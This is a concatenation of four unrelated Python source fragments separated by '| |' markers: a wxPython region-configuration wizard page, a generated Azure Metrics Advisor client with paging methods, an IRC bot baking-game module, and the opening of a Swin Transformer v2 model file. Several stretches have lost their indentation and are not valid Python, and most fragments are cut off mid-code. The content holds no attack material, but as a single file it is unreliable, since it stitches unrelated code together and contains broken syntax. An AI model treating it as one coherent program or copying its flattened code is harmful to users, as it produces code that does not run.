        # self.add_content(self.load_button)
    def on_read(self, event):
        # Currently unreferenced (see the commented-out load_button above);
        # kept for the planned "load existing config" feature.
        reader = wx.FileDialog(
            self, "Open Existing Titanium Cloud Configuration File",
            "", "", "INI file (*.ini)|*.ini",
            wx.FD_OPEN | wx.FD_FILE_MUST_EXIST)
        if reader.ShowModal() == wx.ID_CANCEL:
            return
        # Read in the config file
        global filename, filedir, config
        try:
            config.read(reader.GetPath())
            filename = reader.GetFilename()
            filedir = reader.GetDirectory()
        except Exception as ex:
            wx.LogError("Cannot parse configuration file, Error: %s." % ex)
            # NOTE(review): rebinding the global here leaves any reference
            # captured earlier (e.g. a def-time default argument) pointing
            # at the old parser -- confirm callers.
            config = configparser.RawConfigParser()
            config.optionxform = str
            return
        # todo tsmith
        # Do validation of the imported file
class REGIONPage(ConfigPage):
def load(self):
super(REGIONPage, self).load()
# Header in INI file
self.section = "SHARED_SERVICES"
self.validator_methods = []
self.title = "Region Configuration"
self.help_text = (
"Configuring this system in region mode provides the ability to "
"operate as a secondary independent region to an existing "
"Openstack cloud deployment (Certain restrictions apply, refer to "
"system documentation).\n\n"
"Keystone (and optionally Glance) "
"services can be configured as shared services, which "
"prevents them from being configured on the secondary region and "
"instead those services already configured in the primary region "
"will be accessed.")
self.set_fields()
self.do_setup()
self.bind_events()
# Skip region pages by default
self.skip_region(True)
def set_fields(self):
self.fields['is_region'] = Field(
text="Configure as a secondary region",
type=TYPES.checkbox,
transient=True,
shows=["REGION_NAME",
"ADMIN_TENANT_NAME",
"ADMIN_USER_NAME",
"ADMIN_PASSWORD",
"SERVICE_TENANT_NAME",
"keystone_help",
"KEYSTONE_ADMINURL",
"sep1",
"keystone_note",
]
)
self.fields['REGION_NAME'] = Field(
text="Name of the primary region",
type=TYPES.string,
initial="RegionOne"
)
self.fields["sep1"] = Field(type=TYPES.separator)
self.fields['keystone_help'] = Field(
text="Primary Keystone Configuration\n\nThis information "
"is needed for the primary "
"region in order to validate or create the shared "
"services.",
type=TYPES.help,
)
self.fields['SERVICE_TENANT_NAME'] = Field(
text="Name of the service tenant",
type=TYPES.string,
initial="RegionTwo_services"
)
self.fields['ADMIN_TENANT_NAME'] = Field(
text="Name of the admin tenant",
type=TYPES.string,
initial="admin"
)
self.fields['ADMIN_USER_NAME'] = Field(
text="Username of the keystone admin account",
type=TYPES.string,
initial="admin"
)
self.fields['ADMIN_PASSWORD'] = Field(
text="Password of the keystone admin account",
type=TYPES.string,
initial=""
)
self.fields['KEYSTONE_ADMINURL'] = Field(
text="Authentication URL | |
skip: Optional[int] = None,
maxpagesize: Optional[int] = None,
**kwargs: Any
) -> Iterable[str]:
"""Query dimension values of anomalies.
Query dimension values of anomalies.
:param configuration_id: anomaly detection configuration unique id. Required.
:type configuration_id: str
:param body: query dimension values request. Required.
:type body: any
:keyword skip: for paging, skipped number. Default value is None.
:paramtype skip: int
:keyword maxpagesize: the maximum number of items in one page. Default value is None.
:paramtype maxpagesize: int
:return: An iterator like instance of str
:rtype: ~azure.core.paging.ItemPaged[str]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json")) # type: str
cls = kwargs.pop("cls", None) # type: ClsType[AnomalyDimensionList]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
_json = self._serialize.body(body, "object")
request = build_list_anomaly_dimension_values_request(
configuration_id=configuration_id,
skip=skip,
maxpagesize=maxpagesize,
content_type=content_type,
json=_json,
headers=_headers,
params=_params,
)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
else:
_json = self._serialize.body(body, "object")
request = build_list_anomaly_dimension_values_request(
configuration_id=configuration_id,
content_type=content_type,
json=_json,
headers=_headers,
params=_params,
)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(next_link, **path_format_arguments) # type: ignore
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("AnomalyDimensionList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize("object", pipeline_response)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return ItemPaged(get_next, extract_data)
    @distributed_trace
    def get_incidents_by_anomaly_detection_configuration(
        self, configuration_id: str, body: Any, *, maxpagesize: Optional[int] = None, **kwargs: Any
    ) -> Iterable["_models.AnomalyIncident"]:
        """Query incidents under anomaly detection configuration.

        Query incidents under anomaly detection configuration.

        :param configuration_id: anomaly detection configuration unique id. Required.
        :type configuration_id: str
        :param body: query detection incident result request. Required.
        :type body: any
        :keyword maxpagesize: the maximum number of items in one page. Default value is None.
        :paramtype maxpagesize: int
        :return: An iterator like instance of AnomalyIncident
        :rtype: ~azure.core.paging.ItemPaged[~azure.ai.metricsadvisor.models.AnomalyIncident]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
        _params = kwargs.pop("params", {}) or {}
        content_type = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))  # type: str
        cls = kwargs.pop("cls", None)  # type: ClsType[IncidentResultList]
        error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop("error_map", {}) or {})
        def prepare_request(next_link=None):
            # Build the HTTP request for one page of results.
            if not next_link:
                # First page: POST the serialized query body to the
                # collection endpoint.
                _json = self._serialize.body(body, "object")
                request = build_get_incidents_by_anomaly_detection_configuration_request(
                    configuration_id=configuration_id,
                    maxpagesize=maxpagesize,
                    content_type=content_type,
                    json=_json,
                    headers=_headers,
                    params=_params,
                )
                path_format_arguments = {
                    "endpoint": self._serialize.url(
                        "self._config.endpoint", self._config.endpoint, "str", skip_quote=True
                    ),
                }
                request.url = self._client.format_url(request.url, **path_format_arguments)  # type: ignore
            else:
                # Subsequent pages: the service-supplied next_link becomes
                # the URL; the body is still re-serialized and the verb is
                # forced to GET below (generated pager pattern).
                _json = self._serialize.body(body, "object")
                request = build_get_incidents_by_anomaly_detection_configuration_request(
                    configuration_id=configuration_id,
                    content_type=content_type,
                    json=_json,
                    headers=_headers,
                    params=_params,
                )
                path_format_arguments = {
                    "endpoint": self._serialize.url(
                        "self._config.endpoint", self._config.endpoint, "str", skip_quote=True
                    ),
                }
                request.url = self._client.format_url(next_link, **path_format_arguments)  # type: ignore
                # NOTE(review): this second path_format_arguments is not
                # used before the method override -- codegen artifact.
                path_format_arguments = {
                    "endpoint": self._serialize.url(
                        "self._config.endpoint", self._config.endpoint, "str", skip_quote=True
                    ),
                }
                request.method = "GET"
            return request
        def extract_data(pipeline_response):
            # Deserialize one page and return (continuation, items).
            deserialized = self._deserialize("IncidentResultList", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                # Apply the caller-supplied transform over the raw page.
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)
        def get_next(next_link=None):
            # Send one page request, mapping HTTP errors to azure-core
            # exceptions via error_map.
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(  # type: ignore # pylint: disable=protected-access
                request, stream=False, **kwargs
            )
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                error = self._deserialize.failsafe_deserialize("object", pipeline_response)
                raise HttpResponseError(response=response, model=error)
            return pipeline_response
        return ItemPaged(get_next, extract_data)
    @distributed_trace
    def get_incidents_by_anomaly_detection_configuration_next_pages(
        self, configuration_id: str, *, maxpagesize: Optional[int] = None, token: Optional[str] = None, **kwargs: Any
    ) -> Iterable["_models.AnomalyIncident"]:
        """Query incidents under anomaly detection configuration.

        Query incidents under anomaly detection configuration.  GET-based
        variant that resumes listing from a continuation *token* instead
        of posting a query body.

        :param configuration_id: anomaly detection configuration unique id. Required.
        :type configuration_id: str
        :keyword maxpagesize: the maximum number of items in one page. Default value is None.
        :paramtype maxpagesize: int
        :keyword token: the token for getting the next page. Default value is None.
        :paramtype token: str
        :return: An iterator like instance of AnomalyIncident
        :rtype: ~azure.core.paging.ItemPaged[~azure.ai.metricsadvisor.models.AnomalyIncident]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        _headers = kwargs.pop("headers", {}) or {}
        _params = kwargs.pop("params", {}) or {}
        cls = kwargs.pop("cls", None)  # type: ClsType[IncidentResultList]
        error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop("error_map", {}) or {})
        def prepare_request(next_link=None):
            # Build the HTTP request for one page of results.
            if not next_link:
                # First page: include paging controls (maxpagesize, token).
                request = build_get_incidents_by_anomaly_detection_configuration_next_pages_request(
                    configuration_id=configuration_id,
                    maxpagesize=maxpagesize,
                    token=token,
                    headers=_headers,
                    params=_params,
                )
                path_format_arguments = {
                    "endpoint": self._serialize.url(
                        "self._config.endpoint", self._config.endpoint, "str", skip_quote=True
                    ),
                }
                request.url = self._client.format_url(request.url, **path_format_arguments)  # type: ignore
            else:
                # Subsequent pages: the service-supplied next_link becomes
                # the URL and the verb is forced to GET below.
                request = build_get_incidents_by_anomaly_detection_configuration_next_pages_request(
                    configuration_id=configuration_id,
                    headers=_headers,
                    params=_params,
                )
                path_format_arguments = {
                    "endpoint": self._serialize.url(
                        "self._config.endpoint", self._config.endpoint, "str", skip_quote=True
                    ),
                }
                request.url = self._client.format_url(next_link, **path_format_arguments)  # type: ignore
                # NOTE(review): this second path_format_arguments is not
                # used before the method override -- codegen artifact.
                path_format_arguments = {
                    "endpoint": self._serialize.url(
                        "self._config.endpoint", self._config.endpoint, "str", skip_quote=True
                    ),
                }
                request.method = "GET"
            return request
        def extract_data(pipeline_response):
            # Deserialize one page and return (continuation, items).
            deserialized = self._deserialize("IncidentResultList", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                # Apply the caller-supplied transform over the raw page.
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)
        def get_next(next_link=None):
            # Send one page request, mapping HTTP errors to azure-core
            # exceptions via error_map.
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(  # type: ignore # pylint: disable=protected-access
                request, stream=False, **kwargs
            )
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                error = self._deserialize.failsafe_deserialize("object", pipeline_response)
                raise HttpResponseError(response=response, model=error)
            return pipeline_response
        return ItemPaged(get_next, extract_data)
    @distributed_trace
    def list_incident_root_causes(
        self, detection_configuration_id: str, incident_id: str, **kwargs: Any
    ) -> Iterable["_models.IncidentRootCause"]:
        """Query root cause for incident.

        Query root cause for incident.

        :param detection_configuration_id: anomaly detection configuration unique id. Required.
        :type detection_configuration_id: str
        :param incident_id: incident id. Required.
        :type incident_id: str
        :return: An iterator like instance of IncidentRootCause
        :rtype: ~azure.core.paging.ItemPaged[~azure.ai.metricsadvisor.models.IncidentRootCause]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        _headers = kwargs.pop("headers", {}) or {}
        _params = kwargs.pop("params", {}) or {}
        cls = kwargs.pop("cls", None)  # type: ClsType[RootCauseList]
        error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop("error_map", {}) or {})
        def prepare_request(next_link=None):
            # Build the HTTP request; both branches construct the same
            # request, differing only in which URL is formatted.
            if not next_link:
                request = build_list_incident_root_causes_request(
                    detection_configuration_id=detection_configuration_id,
                    incident_id=incident_id,
                    headers=_headers,
                    params=_params,
                )
                path_format_arguments = {
                    "endpoint": self._serialize.url(
                        "self._config.endpoint", self._config.endpoint, "str", skip_quote=True
                    ),
                }
                request.url = self._client.format_url(request.url, **path_format_arguments)  # type: ignore
            else:
                request = build_list_incident_root_causes_request(
                    detection_configuration_id=detection_configuration_id,
                    incident_id=incident_id,
                    headers=_headers,
                    params=_params,
                )
                path_format_arguments = {
                    "endpoint": self._serialize.url(
                        "self._config.endpoint", self._config.endpoint, "str", skip_quote=True
                    ),
                }
                request.url = self._client.format_url(next_link, **path_format_arguments)  # type: ignore
                # NOTE(review): this second path_format_arguments is not
                # used before the method override -- codegen artifact.
                path_format_arguments = {
                    "endpoint": self._serialize.url(
                        "self._config.endpoint", self._config.endpoint, "str", skip_quote=True
                    ),
                }
                request.method = "GET"
            return request
        def extract_data(pipeline_response):
            # Single-page operation: the continuation token is always None.
            deserialized = self._deserialize("RootCauseList", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                # Apply the caller-supplied transform over the raw page.
                list_of_elem = cls(list_of_elem)
            return None, iter(list_of_elem)
        def get_next(next_link=None):
            # Send the request, mapping HTTP errors to azure-core
            # exceptions via error_map.
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(  # type: ignore # pylint: disable=protected-access
                request, stream=False, **kwargs
            )
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                error = self._deserialize.failsafe_deserialize("object", pipeline_response)
                raise HttpResponseError(response=response, model=error)
            return pipeline_response
        return ItemPaged(get_next, extract_data)
@overload
def create_datasource_credential(  # pylint: disable=inconsistent-return-statements
    self, body: _models.DatasourceCredential, *, content_type: str = "application/json", **kwargs: Any
) -> None:
    """Create a new data source credential.

    Typing overload for a ``DatasourceCredential`` model body (sent as JSON).

    :param body: Create data source credential request. Required.
    :type body: ~azure.ai.metricsadvisor.models.DatasourceCredential
    :keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
     Default value is "application/json".
    :paramtype content_type: str
    :return: None
    :rtype: None
    :raises ~azure.core.exceptions.HttpResponseError:
    """
@overload
def create_datasource_credential(  # pylint: disable=inconsistent-return-statements
    self, body: IO, *, content_type: str = "application/json", **kwargs: Any
) -> None:
    """Create a new data source credential.

    Typing overload for a raw ``IO`` stream body (sent as-is).

    :param body: Create data source credential request. Required.
    :type body: IO
    :keyword content_type: Body Parameter content-type. Content type parameter for binary body.
     Default value is "application/json".
    :paramtype content_type: str
    :return: None
    :rtype: None
    :raises ~azure.core.exceptions.HttpResponseError:
    """
@distributed_trace
def create_datasource_credential( # pylint: disable=inconsistent-return-statements
self, body: Union[_models.DatasourceCredential, IO], **kwargs: Any
) -> None:
"""Create a new data source credential.
Create a new data source credential.
:param body: Create data source credential request. Is either a model type or a IO type.
Required.
:type body: ~azure.ai.metricsadvisor.models.DatasourceCredential or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:return: None
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[None]
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(body, (IO, bytes)):
_content = body
else:
_json = self._serialize.body(body, "DatasourceCredential")
request = build_create_datasource_credential_request(
content_type=content_type,
json=_json,
content=_content,
| |
<gh_stars>1-10
#
# this module was originally written by xfnw.
# (c) xfnw/lickthecheese <<EMAIL>>
#
import time, dataset, out, random
from common import nohighlight
modname = "oven"
DEFAULT_PRICE = 7
ovendb = dataset.connect("sqlite:///dat/oven.db")
oveninv = ovendb["inv"]
ovenqed = ovendb["qed"]
# TODO: add the rest of msgs here
# User-facing message templates keyed by symbolic name; "{}" slots are
# filled with str.format at the call sites below.
msgs = {
    "INV_EMPTY": "you look into the oven and see nothing",
    "BAKE_RESULT": "you bake your items, and out pops a {}!",
    "BAKE_SMOKING": "the oven begins to smoke...",
    "BAKE_EXPLODE": "the oven explodes!",
    "BAKE_MURDER": "{} brutally murders the ducc amidst its terrified quaccs and stuffs it into the oven.",
    "BAKE_NEED_TWO": "you need at least two items",
    "DONT_HAVE_ENOUGH": "you don't have enough of {}",
    "DONT_HAVE_ANY": "you don't have any {}",
    "USER_NOT_FOUND": "that user doesn't exist",
    "FOOD_NOM_NOM": "nom nom nom",
    "DUCK_GONE_GONE": "you lose your hold on the ducc and it flies away!",
}
# Item name -> value used by the baking economy; items not listed here fall
# back to DEFAULT_PRICE.  nohighlight() entries are usernames (wrapped so
# IRC clients don't ping their owners).
baked_goods = {
    nohighlight("khuxkm"): 50,
    nohighlight("jan6"): 50,
    nohighlight("login"): 50,
    "spam": 2,
    "flour": 6,
    "pizza": 10,
    "pancake": 28,
    "water": 20,
    "ration": 38,
    "egg": 30,
    "rice": 40,
    "bread": 40,
    "pie": 58,
    "bird": 50,
    "tortilla": 65,
    "cookie": 74,
    "cheese": 80,
    "sandwich": 95,
    "wafer": 100,
    "ducc": 400,
}
# Reverse lookup: value -> item name.  NOTE(review): duplicate prices
# (khuxkm/jan6/login/bird at 50, rice/bread at 40) collapse to whichever
# entry appears last — confirm this is intended.
baked_price = dict((v, k) for k, v in baked_goods.items())
class NotEnoughItems(Exception):
    """Raised when an inventory lacks the required quantity of an item."""
class TriedBakeDucc(Exception):
    """Raised when someone attempts to bake a ducc."""
class InventoryNotFound(Exception):
    """Raised on an item transfer whose target inventory does not exist."""
class SmokingOven(Exception):
    """Raised when the oven misbehaves — something's wrong."""
def _get_price(item):
    """Return the value of *item*, or DEFAULT_PRICE for unlisted items.

    Idiom fix: dict.get replaces the manual membership test + second lookup.
    """
    return baked_goods.get(item, DEFAULT_PRICE)
def _format_items(items):
    """
    Take an array of items and format it as "name (×count), ..." with the
    entries sorted by ascending item price.

    Idiom fix: collections.Counter replaces the hand-rolled counting loop;
    sorted() is stable, so items of equal price keep first-seen order, as
    before.
    """
    from collections import Counter  # stdlib; local import keeps module deps unchanged
    counts = Counter(items)
    ordered = sorted(counts.items(), key=lambda pair: _get_price(pair[0]))
    return ", ".join(f"{name} (×{count})" for name, count in ordered)
def _destroy_item(nick, item, count):
    """
    Remove *count* copies of *item* from *nick*'s inventory.

    Raises NotEnoughItems if fewer than *count* copies exist.
    """
    rows = list(oveninv.find(name=nick, item=item))
    if len(rows) < count:
        raise NotEnoughItems(f"need {count} of {item}, found {len(rows)}")
    doomed_ids = [row["id"] for row in rows[:count]]
    # dataset translates a list value into an SQL IN clause.
    oveninv.delete(id=doomed_ids)
def _create_item(nick, item, count):
    """Insert *count* copies of *item* into *nick*'s inventory."""
    for _ in range(count):
        oveninv.insert(dict(name=nick, item=item))
def _transfer_item(giver, recipient, item, count):
    """
    Take *count* copies of *item* from <giver>'s inventory and place them
    into <recipient>'s inventory.

    Raises InventoryNotFound if <recipient> has never used the oven, and
    NotEnoughItems if <giver> lacks enough copies.

    Fixes: compare against None with ``is`` (PEP 8), and stop shadowing the
    ``item`` parameter inside the transfer loop (the original rebound it to
    a DB row, which worked only because the parameter was no longer read).
    """
    if ovenqed.find_one(name=recipient) is None:
        raise InventoryNotFound()
    found = list(oveninv.find(name=giver, item=item))
    if len(found) < count:
        raise NotEnoughItems(f"need {count} of {item}, found {len(found)}")
    for row in found[:count]:
        oveninv.delete(id=row["id"])
        oveninv.insert(dict(name=recipient, item=row["item"]))
def _count_item(nick, item):
    """Return how many copies of *item* exist in *nick*'s inventory."""
    return len(list(oveninv.find(name=nick, item=item)))
def _get_baking_results(items):
    """
    Turn a mapping of {item name: count} into a list of output item names.

    The combined value of the inputs is randomized upward by up to one
    average item's value, then repeatedly matched against known price
    points (baked_price) until the remaining value is spent or as many
    items have been produced as were put in.
    """
    total = 0
    # if item has value, use that, else use a okay value
    values = []
    for thing in items:
        for i in range(0, items[thing]):
            values.append(_get_price(thing))
            total += 1
    # oooo randomize what will pop out
    sum_value = sum(values)
    # NOTE(review): ZeroDivisionError for an empty `items` mapping — both
    # callers (bake/recipe) require at least two items, so this holds today.
    avg_value = sum_value / len(values)
    output_value = random.uniform(sum_value, sum_value + avg_value)
    max_price = max(baked_price.keys())
    min_price = min(baked_price.keys())
    newitems = []
    # choose the output
    # keep getting items until we've given enough
    remaining = output_value
    while remaining > min_price:
        # Walk downward until output_value lands on a known price point.
        while output_value not in list(baked_price.keys()):
            output_value = int(output_value - 1)
            if output_value < min_price:
                # Fell below the cheapest item: climb back up to the
                # nearest valid price and stop searching.
                while output_value not in list(baked_price.keys()):
                    output_value = int(output_value + 1)
                break
            elif output_value > max_price:
                # Still above the priciest item: walk down to a valid
                # price and stop searching.
                while output_value not in list(baked_price.keys()):
                    output_value = int(output_value - 1)
                break
        newitems.append(baked_price[output_value])
        remaining = round(remaining - output_value)
        output_value = remaining
        # Never hand out more items than went in.
        if len(newitems) == total:
            break
    return newitems
def _bake_items(nick, items):
    """
    Consume *items* (mapping name -> count) from *nick*'s inventory and
    return the list of freshly baked item names.

    Raises NotEnoughItems or TriedBakeDucc; validation happens before
    anything is destroyed.
    """
    # Validate the whole request first.
    for name, needed in items.items():
        have = _count_item(nick, name)
        if have < needed:
            raise NotEnoughItems(f"need {needed} of {name}, found {have}")
        if name == "ducc":
            raise TriedBakeDucc()
    newitems = _get_baking_results(items)
    # consume the inputs
    for name, needed in items.items():
        _destroy_item(nick, name, needed)
    # create the outputs
    for newitem in newitems:
        _create_item(nick, newitem, 1)
    return newitems
async def purge(self, c, n, m):
    """Admin command: wipe user *m*'s entire oven inventory."""
    if not m:
        await out.msg(self, modname, c, ["need username"])
        return
    oveninv.delete(name=m)
    await out.msg(self, modname, c, ["done"])
async def cheat(self, c, n, m):
    """Admin command: grant one of each listed item to a user.

    *m* is "<user> <item> [<item> ...]".
    """
    parts = m.split(" ")
    if len(parts) < 2:
        await out.msg(self, modname, c, ["need username and item."])
        return
    user, things = parts[0], parts[1:]
    for thing in things:
        _create_item(user, thing, 1)
    await out.msg(self, modname, c, ["done"])
async def give(self, c, n, m):
    """Transfer one item from *n* to another user: "<recipient> <item>"."""
    args = m.split(" ")
    if len(args) < 2:
        await out.msg(self, modname, c, ["you can't give air!"])
        return
    recipient, thing = args[0], args[1]
    if _count_item(n, thing) < 1:
        await out.msg(self, modname, c, [msgs["DONT_HAVE_ANY"].format(thing)])
        return
    try:
        _transfer_item(n, recipient, thing, 1)
    except InventoryNotFound:
        await out.msg(self, modname, c, [msgs["USER_NOT_FOUND"]])
        return
    receiver = nohighlight(recipient)
    await out.msg(self, modname, c, [f"you gave {receiver} a {thing}!"])
async def giveall(self, c, n, m):
    """Transfer every copy of an item from *n* to another user."""
    args = m.split(" ")
    if len(args) < 2:
        await out.msg(self, modname, c, ["you can't give air!"])
        return
    recipient, thing = args[0], args[1]
    itemcount = _count_item(n, thing)
    if itemcount < 1:
        await out.msg(self, modname, c, [msgs["DONT_HAVE_ANY"].format(thing)])
        return
    try:
        _transfer_item(n, recipient, thing, itemcount)
    except InventoryNotFound:
        await out.msg(self, modname, c, [msgs["USER_NOT_FOUND"]])
        return
    receiver = nohighlight(recipient)
    # TODO: pluralize properly
    await out.msg(self, modname, c, [f"you gave {receiver} your {thing}(s)!"])
async def info(self, c, n, m):
    """Report how many of an item exist globally and their combined value."""
    query = m.split(" ")[0]
    if not m:
        await out.msg(self, modname, c, ["need item name"])
        return
    instances = sum(1 for _row in oveninv.find(item=query))
    price = _get_price(query) / 10
    total_price = instances * price
    await out.msg(
        self,
        modname,
        c,
        [
            f"there exist {instances} {query}s, each with a value of ${price:.2f} and a combined value of ${total_price:.2f}"
        ],
    )
async def owners(self, c, n, m):
    """List the top 7 holders of an item with ownership percentages."""
    query = m.split(" ")[0]
    if not m:
        await out.msg(self, modname, c, ["need item name."])
        return
    stats = {}
    total = 0
    for row in oveninv.find(item=query):
        stats[row["name"]] = stats.get(row["name"], 0) + 1
        total += 1
    ranked = sorted(stats.items(), key=lambda kv: kv[1], reverse=True)[:7]
    output = ", ".join(
        "{} (×{}, {:.0f}%)".format(nohighlight(owner), count, (count * 100) / total)
        for owner, count in ranked
    )
    await out.msg(self, modname, c, [f"top {query} owners: {output}"])
async def richest(self, c, n, m):
    """Rank users by total inventory value; optional arg filters to one item."""
    rows = oveninv.find(item=m) if len(m) > 0 else oveninv.find()
    stats = {}
    total = 0
    for row in rows:
        # NOTE(review): listed items count at price/10 while unlisted ones
        # count at the full DEFAULT_PRICE — looks inconsistent with info(),
        # but preserved as-is.
        value = DEFAULT_PRICE
        if row["item"] in baked_goods:
            value = baked_goods[row["item"]] / 10
        stats[row["name"]] = stats.get(row["name"], 0) + value
        total += value
    ranked = sorted(stats.items(), key=lambda kv: kv[1], reverse=True)[:7]
    output = ", ".join(
        "{} (${:.2f}, {:.1f}%)".format(nohighlight(owner), wealth, (wealth * 100) / total)
        for owner, wealth in ranked
    )
    await out.msg(
        self, modname, c, [f"richest users: {output} (total wealth: ${total:,.2f})"]
    )
async def recipe(self, c, n, m):
    """Preview (without consuming anything) what a set of items might bake into."""
    wanted = m.split()
    if len(wanted) < 2:
        await out.msg(self, modname, c, [msgs["BAKE_NEED_TWO"]])
        return
    items = {}
    for thing in wanted:
        if thing == "ducc":
            await out.msg(self, modname, c, ["baking a ducc? how could you?!"])
            return
        items[thing] = items.get(thing, 0) + 1
    try:
        newitems = _get_baking_results(items)
    except SmokingOven:
        await out.msg(self, modname, c, ["something doesn't seem right..."])
        return
    newitems_fmt = _format_items(newitems)
    await out.msg(self, modname, c, [f"those items *might* give a {newitems_fmt}..."])
async def bake(self, c, n, m):
    """Bake the listed items from *n*'s inventory into new items.

    *m* is a space-separated list of item names (at least two).
    """
    _input = m.split()
    if len(_input) < 2:
        await out.msg(self, modname, c, [msgs["BAKE_NEED_TWO"]])
        return
    items = {}
    for thing in _input:
        items[thing] = items.get(thing, 0) + 1
    # verify that they have enough items
    for thing in items:
        found = _count_item(n, thing)
        if found == 0:
            await out.msg(self, modname, c, [msgs["DONT_HAVE_ANY"].format(thing)])
            return
        elif found < items[thing]:
            await out.msg(self, modname, c, [msgs["DONT_HAVE_ENOUGH"].format(thing)])
            return
    try:
        newitems = _bake_items(n, items)
    except NotEnoughItems as err:
        # BUG FIX: the original `pass`ed here and then used `newitems`
        # unbound, raising NameError.  Report the shortfall (covers the
        # case where the inventory changed after the pre-check above).
        await out.msg(self, modname, c, [str(err)])
        return
    except TriedBakeDucc:
        await out.msg(self, modname, c, [msgs["BAKE_MURDER"].format(n)])
        await out.msg(self, modname, c, [msgs["BAKE_EXPLODE"]])
        oveninv.delete(name=n)
        return
    except SmokingOven:
        await out.msg(self, modname, c, [msgs["BAKE_SMOKING"]])
        return
    newitems_fmt = _format_items(newitems)
    await out.msg(self, modname, c, [msgs["BAKE_RESULT"].format(newitems_fmt)])
async def bakeall(self, c, n, m):
item = m.split()[0]
if len(item) < 1:
await out.msg(self, modname, c, ["need item"])
return
found = _count_item(n, item)
if found == 0:
await out.msg(self, modname, c, [msgs["DONT_HAVE_ANY"].format(item)])
return
elif found < 2:
await out.msg(self, modname, c, [msgs["DONT_HAVE_ENOUGH"].format(item)])
return
items = {item: found}
| |
<filename>swin_transformer_v2/model_parts.py
from typing import Tuple, Optional, List, Union, Any
import torch
import torch.nn as nn
import torch.utils.checkpoint as checkpoint
import timm
__all__: List[str] = ["SwinTransformerStage", "SwinTransformerBlock"]
class FeedForward(nn.Sequential):
    """
    Two-layer MLP used in the transformer encoder:
    Linear -> GELU -> Dropout -> Linear -> Dropout.
    """

    def __init__(self,
                 in_features: int,
                 hidden_features: int,
                 out_features: int,
                 dropout: float = 0.) -> None:
        """
        Constructor method
        :param in_features: (int) Number of input features
        :param hidden_features: (int) Number of hidden features
        :param out_features: (int) Number of output features
        :param dropout: (float) Dropout factor
        """
        layers = (
            nn.Linear(in_features=in_features, out_features=hidden_features),
            nn.GELU(),
            nn.Dropout(p=dropout),
            nn.Linear(in_features=hidden_features, out_features=out_features),
            nn.Dropout(p=dropout),
        )
        super().__init__(*layers)
def bchw_to_bhwc(input: torch.Tensor) -> torch.Tensor:
    """
    Moves the channel axis of a 4D tensor to the last position.
    :param input: (torch.Tensor) Input tensor of the shape [batch size, channels, height, width]
    :return: (torch.Tensor) Output tensor of the shape [batch size, height, width, channels]
    """
    # Equivalent to permute(0, 2, 3, 1) for a 4D tensor.
    return input.movedim(1, -1)
def bhwc_to_bchw(input: torch.Tensor) -> torch.Tensor:
    """
    Moves the channel axis of a 4D tensor from the last position to axis 1.
    :param input: (torch.Tensor) Input tensor of the shape [batch size, height, width, channels]
    :return: (torch.Tensor) Output tensor of the shape [batch size, channels, height, width]
    """
    # Equivalent to permute(0, 3, 1, 2) for a 4D tensor.
    return input.movedim(-1, 1)
def unfold(input: torch.Tensor,
           window_size: int) -> torch.Tensor:
    """
    Partitions a feature map into non-overlapping square windows
    (stride = window size).
    :param input: (torch.Tensor) Input feature map of the shape [batch size, channels, height, width]
    :param window_size: (int) Window size to be applied
    :return: (torch.Tensor) Unfolded tensor of the shape [batch size * windows, channels, window size, window size]
